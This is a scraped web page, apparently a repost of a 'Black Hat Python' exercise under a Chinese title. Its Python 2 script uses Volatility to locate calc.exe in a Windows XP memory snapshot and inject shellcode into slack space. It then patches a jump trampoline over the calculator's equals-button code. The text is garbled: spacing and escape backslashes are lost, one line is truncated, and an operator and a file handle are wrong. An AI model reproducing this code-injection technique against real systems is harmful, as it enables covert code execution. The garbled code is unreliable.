python計算機記憶體驗證,Python黑帽子：自動化記憶體驗證

#coding=utf-8

importsysimportstruct

equals_button= 0x01005D51memory_file= "WinXPenSP3-Snapshot8.vmem"slack_space=None

trampoline_offset=None#讀入我們的shellcode

sc_fd = open("cmeasure.bin","rb")

sc=sc_fd.read()

sc_fd.close()

sys.path.append("C:\Python27\volatility-2.3.1")importvolatility.conf as confimportvolatility.registry as registry

registry.PluginImporter()

config=conf.ConfObject()importvolatility.commands as commandsimportvolatility.addrspace as addrspace

config.parse_options()

config.PROFILE= "WinXPSP3x86"config.LOCALTION= "file://%s"%memory_fileimportvolatility.plugins.taskmods as taskmods

p=taskmods.PSList(config)for process inp.calculate():if str(process.ImageFileName) == "calc.exe":print "[*] Found calc.exe with PID %d"%process.UniqueProcessIdprint "[*] Hunting for physical offsets...please wait."address_space=process.get_process_address_space()

pages=address_space.get_available_pages()for page inpages:

physical=address_space.vtop(page[0])if physical is notNone:if slack_space isNone:

fd= open(memory_file,"r+")

fd.seek(physical)

buf= fd.read(page[1])try:

offset= buf.index("x00"*len(sc))

slack_space= page[0] +offsetprint "[*] Found good shellcode location!"

print "[*] Virtual address: 0x%08x"%slack_spaceprint "[*] Physical address: 0x%08x"%(physical +offset)print "[*] Injecting shellcode."fd.seek(physical+offset)

fd.write(sc)

fd.close()#建立我們的跳轉代碼

tramp = "xbb%s"%struct.pack("

tramp+= "xffxe3"

if trampoline_offset is notNone:break

except:passfd.close()#檢視目标代碼的位置

if page[0] <= equals_button and equals_button < ((page[0] + page[1]) - 7):print "[*] Found our trampoline target at: 0x%08x"%(physical)#計算虛拟偏移

v_offset = equals_button =page[0]#計算實體偏移

trampoline_offset = physical +v_offsetprint "[*] Found our trampoline target at: 0x%08x"%(trampoline_offset)if slack_space is notNone:break

print "[*] Writing trampoline..."fd= open(memory_file,"r+")

fd.seek(trampoline_offset)

fd.write(tramp)

f.close()print "[*] Done injecting code."